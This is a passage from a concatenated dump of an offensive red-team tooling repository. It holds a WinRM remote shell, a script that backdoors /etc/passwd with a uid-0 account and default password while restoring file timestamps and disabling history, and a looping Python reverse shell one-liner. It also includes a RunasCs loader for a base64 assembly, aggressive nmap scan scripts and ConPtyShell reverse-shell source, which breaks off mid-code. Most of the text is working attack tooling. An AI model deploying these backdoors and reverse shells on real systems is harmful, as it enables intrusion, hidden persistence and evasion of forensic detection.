- done, check ${output} ツ" 23 | -------------------------------------------------------------------------------- /lateral-movement/winrm-fs.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'winrm-fs' 4 | require 'tty-reader' 5 | require 'optparse' 6 | 7 | # Author: Alamot, Lupman 8 | # winrm-fs.rb -h 127.0.0.1 -u user -p password 9 | # To upload a file type: UPLOAD local_path remote_path 10 | # e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt 11 | # e.g.: PS> DOWNLOAD C:\temp\myfile.txt myfile.txt 12 | 13 | reader = TTY::Reader.new 14 | 15 | options = {} 16 | OptionParser.new do |opts| 17 | opts.banner = "Usage: #{$0} [options]" 18 | 19 | opts.on('-h', '--host HOST', 'Host address') { |v| options[:host] = v } 20 | opts.on('-P', '--port PORT', Integer, 'Host port') { |v| options[:port] = v } 21 | opts.on(nil, '--ssl', 'HTTPS protocol') { |v| options[:ssl] = v } 22 | opts.on('-u', '--user USERNAME', 'Username') { |v| options[:username] = v } 23 | opts.on('-p', '--password PASSWORD', 'Password') { |v| options[:password] = v } 24 | opts.on(nil, '--help', 'Display this screen') do 25 | puts opts 26 | exit 27 | end 28 | 29 | end.parse! 
30 | 31 | if options[:ssl] then 32 | protocol = "https" 33 | else 34 | protocol = "http" 35 | end 36 | host = options[:host] 37 | port = options[:port] 38 | if not port then 39 | if options[:ssl] then 40 | port = 5986 41 | else 42 | port = 5985 43 | end 44 | end 45 | username = options[:username] 46 | password = options[:password] 47 | 48 | if not host then 49 | puts "No host specified" 50 | exit 51 | end 52 | 53 | if not username then 54 | username = reader.read_line("Username: ").chomp 55 | end 56 | 57 | if not password then 58 | password = reader.read_line("Password: ", echo: false).chomp 59 | end 60 | 61 | #reader = TTY::Reader.new(history_duplicates: true) 62 | reader = TTY::Reader.new(history_duplicates: false) 63 | reader.on(:keyctrl_x) { puts ""; puts "Exiting..."; exit } 64 | 65 | conn = WinRM::Connection.new( 66 | endpoint: "#{protocol}://#{host}:#{port}/wsman", 67 | transport: :ssl, 68 | user: username, 69 | password: password, 70 | :no_ssl_peer_verification => true 71 | ) 72 | 73 | file_manager = WinRM::FS::FileManager.new(conn) 74 | 75 | class String 76 | def tokenize 77 | self. 78 | split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/). 79 | select {|s| not s.empty? }. 
80 | map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')} 81 | end 82 | end 83 | 84 | command = "" 85 | 86 | conn.shell(:powershell) do | shell | 87 | until command == "exit\n" do 88 | begin 89 | output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$pwd,'> ')") 90 | command = reader.read_line(output.output.chomp) 91 | 92 | if command.start_with?('UPLOAD ') then 93 | upload_command = command.tokenize 94 | src = upload_command[1] 95 | dest = upload_command[2] 96 | 97 | if not dest then 98 | dest = upload_command[1].split('/')[-1] 99 | end 100 | if not dest.index ':\\' then 101 | output = shell.run("-join($pwd)") 102 | dest = output.output.chomp.strip() + "\\" + dest 103 | end 104 | 105 | puts("Uploading " + src + " to " + dest) 106 | file_manager.upload(src, dest) do | bytes_copied, total_bytes, local_path, remote_path | 107 | puts("#{bytes_copied} bytes of #{total_bytes} bytes copied") 108 | end 109 | command = "echo OK`n" 110 | end 111 | 112 | if command.start_with?('DOWNLOAD ') then 113 | download_command = command.tokenize 114 | 115 | src = download_command[1] 116 | if not src.index ':\\' then 117 | output = shell.run("-join($pwd)") 118 | src = output.output.chomp.strip() + "\\" + src 119 | end 120 | 121 | dest = download_command[2] 122 | if not dest then 123 | dest = download_command[1].split('\\')[-1] 124 | end 125 | 126 | puts("Downloading " + src + " to " + dest) 127 | file_manager.download(src, dest) do | bytes_copied, total_bytes, remote_path, local_path | 128 | puts("#{bytes_copied} bytes of #{total_bytes} bytes copied") 129 | end 130 | command = "echo OK`n" 131 | end 132 | 133 | output = shell.run(command) do | stdout, stderr | 134 | if stdout != nil 135 | STDOUT.write stdout.rstrip + "\n" 136 | end 137 | if stderr != nil 138 | STDOUT.write stderr.rstrip + "\n" 139 | end 140 | end 141 | rescue => e 142 | puts e 143 | end 144 | end 145 | puts("Exiting with code #{output.exitcode}") 146 | end 147 | 
-------------------------------------------------------------------------------- /persistence/backdoor-passwd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | set +o history 4 | echo "[i] - history disabled.." 5 | 6 | if [[ $EUID > 0 ]]; then 7 | echo "[!] - you have to be root ¯\_(ツ)_/¯" 8 | exit 9 | fi 10 | 11 | user=${1:-"uucp"} 12 | password=${2:-"b4ckd00r3d"} 13 | mtime_passwd=`stat -c "%y" /etc/passwd` 14 | mtime_shadow=`stat -c "%y" /etc/shadow` 15 | mtime_passwd_seconds=`stat -c "%y" /etc/passwd | cut -d'.' -f 1 | sed -e "s/[-| |:]//g"` 16 | mtime_shadow_seconds=`stat -c "%y" /etc/shadow | cut -d'.' -f 1 | sed -e "s/[-| |:]//g"` 17 | 18 | echo "[!] - /etc/passwd was modified @ ${mtime_passwd}" 19 | echo "[!] - /etc/shadow was modified @ ${mtime_shadow}" 20 | 21 | echo "[!] - setting ${user} uid and gid to 0 and enabling shell" 22 | sed -i "s/.*${user}.*/${user}:x:0:0:${user}:\/dev\/shm\/.${user}:\/bin\/bash/" /etc/passwd 23 | 24 | echo "[!] - restoring mtime of /etc/passwd to ${mtime_passwd}" 25 | touch -d "${mtime_passwd}" /etc/passwd 26 | 27 | echo "[!] - setting ${user} password to ${password}" 28 | echo "${user}:${password}" | chpasswd 29 | 30 | echo "[!] - restoring mtime of /etc/shadow to ${mtime_shadow}" 31 | touch -d "${mtime_shadow}" /etc/shadow 32 | 33 | echo "[!] - creating home directory in /dev/shm/.${user}" 34 | mkdir -p "/dev/shm/.${user}" 35 | 36 | echo "[!] - disabling bash history for ${user} user" 37 | echo "set +o history" > /dev/shm/.${user}/.bash_profile 38 | echo "set +o history" > /dev/shm/.${user}/.bash_rc 39 | 40 | echo "[!] - unsetting HISTFILE for ${user} user" 41 | echo "unset HISTFILE" >> /dev/shm/.${user}/.bash_profile 42 | echo "unset HISTFILE" >> /dev/shm/.${user}/.bash_rc 43 | 44 | echo "[!] 
- disabling eventual PROMPT_COMMAND keylogger" 45 | echo "unset PROMPT_COMMAND" >> /dev/shm/.${user}/bash_profile 46 | echo "unset PROMPT_COMMAND" >> /dev/shm/.${user}/bash_rc 47 | 48 | echo "[!] - enjoy your new pseudo-root account ツ" 49 | echo "[!] - ${user} : ${password}" 50 | 51 | exit 52 | -------------------------------------------------------------------------------- /persistence/nohup.sh: -------------------------------------------------------------------------------- 1 | nohup /bin/bash -c "while true; do \$(which python3 || which python2 || which python) -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"IP\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'; done" 2>/dev/null & 2 | -------------------------------------------------------------------------------- /privilege-escalation/Invoke-FileHijackCheck/Invoke-FileHijackCheck.ps1: -------------------------------------------------------------------------------- 1 | $ErrorActionPreference= 'silentlycontinue' 2 | #$ErrorActionPreference= 'continue' 3 | 4 | # https://stackoverflow.com/a/24992975 5 | function Test-FileWriteLock { 6 | param ( 7 | [parameter(Mandatory=$true)][string]$Path 8 | ) 9 | 10 | $oFile = New-Object System.IO.FileInfo $Path 11 | 12 | if ((Test-Path -Path $Path) -eq $false) { 13 | return $false 14 | } 15 | 16 | try { 17 | $oStream = $oFile.Open([System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None) 18 | 19 | if ($oStream) { 20 | $oStream.Close() 21 | } 22 | $false 23 | } catch { 24 | # file is locked by a process. 
25 | return $true 26 | } 27 | } 28 | 29 | function Test-FileOpenLock() { 30 | param ( 31 | [parameter(Mandatory=$true)] 32 | [string] 33 | $Path 34 | ) 35 | 36 | $relativePath = (split-path -noq $Path).substring(1) 37 | $res = $(.\handle.exe -nobanner $relativePath) 38 | if ($res -eq "No matching handles found.") { 39 | return $false 40 | } 41 | 42 | return $true 43 | } 44 | 45 | function CheckFile() { 46 | Param( 47 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 48 | [String] 49 | [ValidateNotNullOrEmpty()] 50 | $Identity, 51 | 52 | [Parameter(Position = 1, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 53 | [String] 54 | [ValidateNotNullOrEmpty()] 55 | $Path 56 | ) 57 | 58 | $acls = $(acl $Path) | select -ExpandProperty access 59 | 60 | if ($acls) { 61 | $builtin_users = $(acl $Path | select -ExpandProperty access | Where-Object {$_.identityreference -eq $Identity}) 62 | foreach ($perm in $builtin_users.FileSystemRights) { 63 | if (($perm -like "*FullControl*") -or 64 | ($perm -like "*Delete*") -or 65 | ($perm -like "*Modify*")) { 66 | return $perm 67 | } 68 | } 69 | } 70 | 71 | return 0 72 | } 73 | 74 | function CheckDirectory() { 75 | Param( 76 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 77 | [String] 78 | [ValidateNotNullOrEmpty()] 79 | $Identity, 80 | 81 | [Parameter(Position = 1, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 82 | [String] 83 | [ValidateNotNullOrEmpty()] 84 | $Path 85 | ) 86 | 87 | $acls = $(acl $Path) | select -ExpandProperty access 88 | 89 | if ($acls) { 90 | $builtin_users = $(acl $Path | select -ExpandProperty access | Where-Object {$_.identityreference -eq $Identity}) 91 | foreach ($perm in $builtin_users.FileSystemRights) { 92 | if (($perm -like "*FullControl*") -or 93 | ($perm -like "*Write*") -or 94 | ($perm -like 
"*CreateFiles*") -or 95 | ($perm -like "*Modify*")) { 96 | return $perm 97 | } 98 | } 99 | } 100 | 101 | return 0 102 | } 103 | 104 | function Invoke-FileHijackCheck() { 105 | <# 106 | 107 | .SYNOPSIS 108 | 109 | Simple function to analyze ProcMon CSV output checking for potential Symlink File Hijack to SYSTEM Impersonation Attacks 110 | 111 | Author: Francesco Soncina (phra) 112 | License: BSD 3-Clause 113 | 114 | .DESCRIPTION 115 | 116 | Simple function to analyze ProcMon CSV output checking for potential Symlink File Hijack to SYSTEM Impersonation Attacks. 117 | It needs "Handle.exe" from SysInternals in the same directory of this script. 118 | To export data from ProcMon, save it in CSV format. (filter by Operation:WriteFile + User:NT AUTHORITY\SYSTEM) 119 | 120 | .PARAMETER Csv 121 | 122 | The CSV file to read. 123 | 124 | .EXAMPLE 125 | 126 | Invoke-FileHijackCheck .\Logfile.csv 127 | 128 | Analyze CSV file Logfile.csv in the current directory 129 | 130 | #> 131 | [CMDLetBinding()] 132 | Param( 133 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 134 | [String] 135 | [ValidateNotNullOrEmpty()] 136 | $Csv, 137 | 138 | [switch] 139 | $ShowOnlyVulnerable 140 | ) 141 | 142 | $paths = type $Csv | convertfrom-csv | Sort-Object -prop path -unique 143 | $usersToCheck = "NT AUTHORITY\INTERACTIVE", 144 | "BUILTIN\Users", 145 | "NT AUTHORITY\Authenticated Users", 146 | "NT AUTHORITY\LOCAL SERVICE", 147 | "Everyone", 148 | $(whoami) 149 | 150 | foreach ($path in $paths) { 151 | $acls = $(acl $path.Path) | select -ExpandProperty access 152 | foreach ($user in $usersToCheck) { 153 | $res = $(CheckFile $user $path.Path) 154 | 155 | if ($res -ne 0) { 156 | $parent = Split-Path -path $path.Path 157 | $res2 = $(CheckDirectory $user $parent) 158 | if ($res2 -ne 0) { 159 | if (Test-FileOpenLock $path.Path) { 160 | if (-not $ShowOnlyVulnerable) { 161 | write-host -nonewline $user " => " $path.Path 162 | write-host 
-ForegroundColor green " [LOCKED]" 163 | } 164 | } else { 165 | write-host -nonewline $user " => " $path.Path 166 | write-host -ForegroundColor red " [VULNERABLE!]" 167 | } 168 | } 169 | } 170 | } 171 | } 172 | } 173 | -------------------------------------------------------------------------------- /privilege-escalation/Invoke-FileHijackCheck/handle.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nkeys/redteam/d8ad2009a354d466e11fda6074dd4610f82089ee/privilege-escalation/Invoke-FileHijackCheck/handle.exe -------------------------------------------------------------------------------- /privilege-escalation/Invoke-RunasCs.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | RunasCs is a utility to run specific processes with different permissions 3 | than the user's current logon provides using explicit credentials. 4 | Author: @splinter_code 5 | License: GPL-3.0 6 | Source: https://github.com/antonioCoco/RunasCs 7 | #> 8 | 9 | #Requires -Version 2 10 | 11 | function Invoke-RunasCs 12 | { 13 | <# 14 | .SYNOPSIS 15 | RunasCs - Csharp and open version of windows builtin runas.exe 16 | 17 | .PARAMETER Username 18 | The username of the user 19 | .PARAMETER Password 20 | The password of the user 21 | .PARAMETER Command 22 | A command supported by cmd.exe if ProcessTimeout>0 23 | The commandline for the process if ProcessTimeout=0 24 | .PARAMETER Domain 25 | The domain of the user, if in a domain. 26 | Default: "" 27 | .PARAMETER ProcessTimeout 28 | The waiting time (in ms) to use in 29 | the WaitForSingleObject() function. 30 | This will halt the process until the spawned 31 | process ends and sends the output back to the caller. 32 | If you set 0 an async process will be 33 | created and no output will be retrieved. 34 | If this parameter is set to 0, cmd.exe won't be 35 | used to spawn the process. 
36 | Default: "120000" 37 | .PARAMETER LogonType 38 | The logon type for the spawned process. 39 | Default: "3" 40 | 41 | .EXAMPLE 42 | Run a command as a specific local user 43 | Invoke-RunasCs user1 password1 whoami 44 | .EXAMPLE 45 | Run a command as a specific domain user 46 | Invoke-RunasCs -Domain domain1 -Username user1 -Password password1 -Command whoami 47 | .EXAMPLE 48 | Run a command as a specific local user with interactive logon type (2) 49 | Invoke-RunasCs -Username user1 -Password password1 -Command whoami -LogonType 2 50 | .EXAMPLE 51 | Run a background/async process as a specific local user, 52 | i.e. meterpreter ps1 reverse shell 53 | Invoke-RunasCs -Username user1 -Password "password1" -ProcessTimeout 0 -Command "%COMSPEC% powershell -enc..." 54 | .EXAMPLE 55 | Run a background/async interactive process as a specific local user, 56 | i.e. meterpreter ps1 reverse shell 57 | Invoke-RunasCs -Username user1 -Password password1 -ProcessTimeout 0 -LogonType 2 -Command "%COMSPEC% powershell -enc.." 
58 | #> 59 | Param 60 | ( 61 | [Parameter(Position = 0, Mandatory = $True)] 62 | [String] 63 | $Username, 64 | 65 | [Parameter(Position = 1, Mandatory = $True)] 66 | [String] 67 | $Password, 68 | 69 | [Parameter(Position = 2, Mandatory = $True)] 70 | [String] 71 | $Command, 72 | 73 | [Parameter()] 74 | [String] 75 | $Domain = "", 76 | 77 | [Parameter()] 78 | [String] 79 | $ProcessTimeout = "120000", 80 | 81 | [Parameter()] 82 | [String] 83 | $LogonType = "3" 84 | ) 85 | [string[]] $parameteresRunasCs = @($Username, $Password, $Command, $Domain, $ProcessTimeout, $LogonType) 86 | $RunasCsBase64 = "| $RunasCsBytes = [System.Convert]::FromBase64String($RunasCsBase64) 88 | [Reflection.Assembly]::Load($RunasCsBytes) | Out-Null 89 | $output = [RunasCsMainClass]::RunasCsMain($parameteresRunasCs) 90 | Write-Output $output 91 | } 92 | -------------------------------------------------------------------------------- /scanners/nmap/scan.parallel.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | apt install libnotify-bin parallel 4 | 5 | mkdir -p scans 6 | 7 | if [ $# -eq 0 ] 8 | then 9 | echo "usage: bash scan.parallel.sh [#jobs]" 10 | exit 1 11 | fi 12 | 13 | TARGETS=$1 14 | JOBS=${2:-""} 15 | 16 | echo "Starting TCP Scan with $JOBS jobs" 17 | 18 | parallel -j$JOBS --ungroup --bar -a $TARGETS --max-args 1 'echo TCP: Job {#} of {= $_=total_jobs() =} - {} && echo "scan.parallel.sh" "beginning TCP - {#} / {= $_=total_jobs() =} - {}" && nmap -A -p- -v --reason -T5 -sS --script "(default or safe or vuln or discovery) and not broadcast" -oA scans/{}.tcp {}' # & 19 | 20 | echo "Starting UDP Scan with $JOBS jobs (top 50 ports)" 21 | 22 | parallel -j$JOBS --ungroup -a $TARGETS --max-args 1 'echo UDP: Job {#} of {= $_=total_jobs() =} - {} && echo "scan.parallel.sh" "beginning UDP - {#} / {= $_=total_jobs() =} - {}" && nmap -sU -sV -T4 --top-ports 50 -oA scans/{}.udp {}' & 23 | 24 | wait 25 | 26 | echo "Done!" 
27 | -------------------------------------------------------------------------------- /scanners/nmap/scan.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | for ip in "$@" 4 | do 5 | echo "Creating $ip directory" 6 | 7 | mkdir -p $ip 8 | 9 | echo "Starting TCP Scan for $ip" 10 | 11 | nmap -A -p- --reason -T4 -sS --script "(default or safe or vuln or intrusive or discovery) and not broadcast" -oA $ip/$ip.tcp $ip & 12 | 13 | echo "Starting UDP Scan for $ip" 14 | 15 | nmap -sU -sV -T4 --top-ports 100 --script "(default or safe or vuln or intrusive or discovery) and not broadcast" -oA $ip/$ip.udp $ip & 16 | done 17 | 18 | wait 19 | 20 | echo "Done!" 21 | -------------------------------------------------------------------------------- /shellcode/pic.asm: -------------------------------------------------------------------------------- 1 | ; nasm -felf64 test.asm -o test.o && ld test.o -o test && chmod u+x test && ./test 2 | SYS_WRITE equ 1 3 | SYS_EXIT equ 60 4 | STD_OUTPUT equ 1 5 | 6 | section .text 7 | global _start 8 | 9 | _start: 10 | mov rax, SYS_WRITE 11 | mov rdi, STD_OUTPUT 12 | lea rsi, [rel msg] 13 | mov rdx, msglen 14 | syscall 15 | mov rax, SYS_EXIT 16 | mov rdi, 0 17 | syscall 18 | msg: db `Shellcode: "Hello world!"\n` 19 | msglen equ $-msg 20 | -------------------------------------------------------------------------------- /shells/ConPtyShell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nkeys/redteam/d8ad2009a354d466e11fda6074dd4610f82089ee/shells/ConPtyShell.exe -------------------------------------------------------------------------------- /shells/Invoke-ConPtyShell.ps1: -------------------------------------------------------------------------------- 1 | #Requires -Version 2 2 | 3 | function Invoke-ConPtyShell 4 | { 5 | <# 6 | .SYNOPSIS 7 | ConPtyShell - Fully Interactive Reverse Shell for Windows 8 | Author: 
splinter_code 9 | License: MIT 10 | Source: https://github.com/antonioCoco/ConPtyShell 11 | 12 | .DESCRIPTION 13 | ConPtyShell - Fully interactive reverse shell for Windows 14 | 15 | Properly set the rows and cols values. You can retrieve it from 16 | your terminal with the command "stty size". 17 | 18 | You can avoid to set rows and cols values if you run your listener 19 | with the following command: 20 | stty raw -echo; (stty size; cat) | nc -lvnp 3001 21 | 22 | If you want to change the console size directly from powershell 23 | you can paste the following commands: 24 | $width=80 25 | $height=24 26 | $Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height) 27 | $Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height) 28 | 29 | 30 | .PARAMETER RemoteIp 31 | The remote ip to connect 32 | .PARAMETER RemotePort 33 | The remote port to connect 34 | .PARAMETER Rows 35 | Rows size for the console 36 | Default: "24" 37 | .PARAMETER Cols 38 | Cols size for the console 39 | Default: "80" 40 | .PARAMETER CommandLine 41 | The commandline of the process that you are going to interact 42 | Default: "powershell.exe" 43 | 44 | .EXAMPLE 45 | PS>Invoke-ConPtyShell 10.0.0.2 3001 46 | 47 | Description 48 | ----------- 49 | Spawn a reverse shell 50 | 51 | .EXAMPLE 52 | PS>Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 30 -Cols 90 53 | 54 | Description 55 | ----------- 56 | Spawn a reverse shell with specific rows and cols size 57 | 58 | .EXAMPLE 59 | PS>Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 30 -Cols 90 -CommandLine cmd.exe 60 | 61 | Description 62 | ----------- 63 | Spawn a reverse shell (cmd.exe) with specific rows and cols size 64 | 65 | #> 66 | Param 67 | ( 68 | [Parameter(Position = 0, Mandatory = $True)] 69 | [String] 70 | $RemoteIp, 71 | 72 | [Parameter(Position = 1, Mandatory = $True)] 73 | [String] 74 | $RemotePort, 75 | 76 | [Parameter()] 77 
| [String] 78 | $Rows = "24", 79 | 80 | [Parameter()] 81 | [String] 82 | $Cols = "80", 83 | 84 | [Parameter()] 85 | [String] 86 | $CommandLine = "powershell.exe" 87 | ) 88 | $parametersConPtyShell = @($RemoteIp, $RemotePort, $Rows, $Cols, $CommandLine) 89 | Add-Type -TypeDefinition $Source -Language CSharp; 90 | $output = [ConPtyShellMainClass]::ConPtyShellMain($parametersConPtyShell) 91 | Write-Output $output 92 | } 93 | 94 | $Source = @" 95 | using System; 96 | using System.IO; 97 | using System.Text; 98 | using System.Threading; 99 | using System.Net; 100 | using System.Net.Sockets; 101 | using System.Runtime.InteropServices; 102 | 103 | public static class ConPtyShell 104 | { 105 | private const string errorString = "{{{ConPtyShellException}}}\r\n"; 106 | private const uint ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004; 107 | private const uint DISABLE_NEWLINE_AUTO_RETURN = 0x0008; 108 | private const uint PROC_THREAD_ATTRIBUTE_PSEUDOCONSOLE = 0x00020016; 109 | private const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000; 110 | private const uint CREATE_NO_WINDOW = 0x08000000; 111 | private const int STARTF_USESTDHANDLES = 0x00000100; 112 | 113 | private const UInt32 INFINITE = 0xFFFFFFFF; 114 | private const uint GENERIC_READ = 0x80000000; 115 | private const uint GENERIC_WRITE = 0x40000000; 116 | private const uint FILE_SHARE_READ = 0x00000001; 117 | private const uint FILE_SHARE_WRITE = 0x00000002; 118 | private const uint FILE_ATTRIBUTE_NORMAL = 0x80; 119 | private const uint OPEN_EXISTING = 3; 120 | private const int STD_INPUT_HANDLE = -10; 121 | private const int STD_OUTPUT_HANDLE = -11; 122 | private const int STD_ERROR_HANDLE = -12; 123 | 124 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 125 | private struct STARTUPINFOEX 126 | { 127 | public STARTUPINFO StartupInfo; 128 | public IntPtr lpAttributeList; 129 | } 130 | 131 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 132 | private struct STARTUPINFO 133 | { 134 | 
public Int32 cb; 135 | public string lpReserved; 136 | public string lpDesktop; 137 | public string lpTitle; 138 | public Int32 dwX; 139 | public Int32 dwY; 140 | public Int32 dwXSize; 141 | public Int32 dwYSize; 142 | public Int32 dwXCountChars; 143 | public Int32 dwYCountChars; 144 | public Int32 dwFillAttribute; 145 | public Int32 dwFlags; 146 | public Int16 wShowWindow; 147 | public Int16 cbReserved2; 148 | public IntPtr lpReserved2; 149 | public IntPtr hStdInput; 150 | public IntPtr hStdOutput; 151 | public IntPtr hStdError; 152 | } 153 | 154 | [StructLayout(LayoutKind.Sequential)] 155 | private struct PROCESS_INFORMATION 156 | { 157 | public IntPtr hProcess; 158 | public IntPtr hThread; 159 | public int dwProcessId; 160 | public int dwThreadId; 161 | } 162 | 163 | [StructLayout(LayoutKind.Sequential)] 164 | private struct SECURITY_ATTRIBUTES 165 | { 166 | public int nLength; 167 | public IntPtr lpSecurityDescriptor; 168 | public int bInheritHandle; 169 | } 170 | 171 | [StructLayout(LayoutKind.Sequential)] 172 | private struct COORD 173 | { 174 | public short X; 175 | public short Y; 176 | } 177 | 178 | [DllImport("kernel32.dll", SetLastError = true)] 179 | [return: MarshalAs(UnmanagedType.Bool)] 180 | private static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize); 181 | 182 | [DllImport("kernel32.dll", SetLastError = true)] 183 | [return: MarshalAs(UnmanagedType.Bool)] 184 | private static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize); 185 | 186 | [DllImport("kernel32.dll", SetLastError = true)] 187 | [return: MarshalAs(UnmanagedType.Bool)] 188 | private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint 
dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 189 | 190 | [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Auto)] 191 | private static extern bool CreateProcessW(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 192 | 193 | [DllImport("kernel32.dll", SetLastError=true)] 194 | [return: MarshalAs(UnmanagedType.Bool)] 195 | private static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode); 196 | 197 | [DllImport("kernel32.dll", SetLastError=true)] 198 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 199 | 200 | [DllImport("kernel32.dll", SetLastError=true)] 201 | private static extern bool SetStdHandle(int nStdHandle, IntPtr hHandle); 202 | 203 | [DllImport("kernel32.dll", SetLastError = true)] 204 | private static extern IntPtr GetStdHandle(int nStdHandle); 205 | 206 | [DllImport("kernel32.dll", SetLastError = true)] 207 | private static extern bool CloseHandle(IntPtr hObject); 208 | 209 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 210 | private static extern bool CreatePipe(out IntPtr hReadPipe, out IntPtr hWritePipe, SECURITY_ATTRIBUTES lpPipeAttributes, int nSize); 211 | 212 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall, SetLastError = true)] 213 | private static extern IntPtr CreateFile(string lpFileName, uint dwDesiredAccess, uint dwShareMode, IntPtr SecurityAttributes, uint dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile); 214 | 215 | [DllImport("kernel32.dll", SetLastError = true)] 216 | private static extern bool ReadFile(IntPtr hFile, [Out] byte[] lpBuffer, uint 
nNumberOfBytesToRead, out uint lpNumberOfBytesRead, IntPtr lpOverlapped); 217 | 218 | [DllImport("kernel32.dll", SetLastError=true)] 219 | private static extern bool WriteFile(IntPtr hFile, byte [] lpBuffer, uint nNumberOfBytesToWrite, out uint lpNumberOfBytesWritten, IntPtr lpOverlapped); 220 | 221 | [DllImport("kernel32.dll", SetLastError = true)] 222 | private static extern int CreatePseudoConsole(COORD size, IntPtr hInput, IntPtr hOutput, uint dwFlags, out IntPtr phPC); 223 | 224 | [DllImport("kernel32.dll", SetLastError = true)] 225 | private static extern int ClosePseudoConsole(IntPtr hPC); 226 | 227 | [DllImport("kernel32.dll", SetLastError = true)] 228 | private static extern bool SetConsoleMode(IntPtr hConsoleHandle, uint mode); 229 | 230 | [DllImport("kernel32.dll", SetLastError = true)] 231 | private static extern bool GetConsoleMode(IntPtr handle, out uint mode); 232 | 233 | [DllImport("kernel32.dll", CharSet=CharSet.Auto)] 234 | private static extern IntPtr GetModuleHandle(string lpModuleName); 235 | 236 | [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)] 237 | private static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 238 | 239 | private static Socket ConnectSocket(string remoteIp, int remotePort){ 240 | Socket s = null; 241 | IPAddress remoteIpInt = IPAddress.Parse(remoteIp); 242 | IPEndPoint ipEndpoint = new IPEndPoint(remoteIpInt, remotePort); 243 | Socket shellSocket = new Socket(ipEndpoint.AddressFamily, SocketType.Stream, ProtocolType.Tcp); 244 | try{ 245 | shellSocket.Connect(ipEndpoint); 246 | if(shellSocket.Connected) 247 | s = shellSocket; 248 | byte[] banner = Encoding.ASCII.GetBytes("\r\nConPtyShell - @splinter_code\r\n"); 249 | s.Send(banner); 250 | } 251 | catch{ 252 | s = null; 253 | } 254 | return s; 255 | } 256 | 257 | private static void TryParseRowsColsFromSocket(Socket shellSocket, ref uint rows, ref uint cols){ 258 | Thread.Sleep(500);//little tweak for slower connections 259 | 
if (shellSocket.Available > 0){ 260 | byte[] received = new byte[100]; 261 | int rowsTemp, colsTemp; 262 | int bytesReceived = shellSocket.Receive(received); 263 | string sizeReceived = Encoding.ASCII.GetString(received,0,bytesReceived); 264 | string rowsString = sizeReceived.Split(' ')[0].Trim(); 265 | string colsString = sizeReceived.Split(' ')[1].Trim(); 266 | if(Int32.TryParse(rowsString, out rowsTemp) && Int32.TryParse(colsString, out colsTemp)){ 267 | rows=(uint)rowsTemp; 268 | cols=(uint)colsTemp; 269 | } 270 | } 271 | } 272 | 273 | private static void CreatePipes(ref IntPtr InputPipeRead, ref IntPtr InputPipeWrite, ref IntPtr OutputPipeRead, ref IntPtr OutputPipeWrite){ 274 | int securityAttributeSize = Marshal.SizeOf(); 275 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES { nLength = securityAttributeSize, bInheritHandle=1, lpSecurityDescriptor=IntPtr.Zero }; 276 | if(!CreatePipe(out InputPipeRead, out InputPipeWrite, pSec, 0)) 277 | throw new InvalidOperationException("Could not create the InputPipe"); 278 | if(!CreatePipe(out OutputPipeRead, out OutputPipeWrite, pSec, 0)) 279 | throw new InvalidOperationException("Could not create the OutputPipe"); 280 | } 281 | 282 | private static void InitConsole(){ 283 | IntPtr hStdout = CreateFile("CONOUT$", 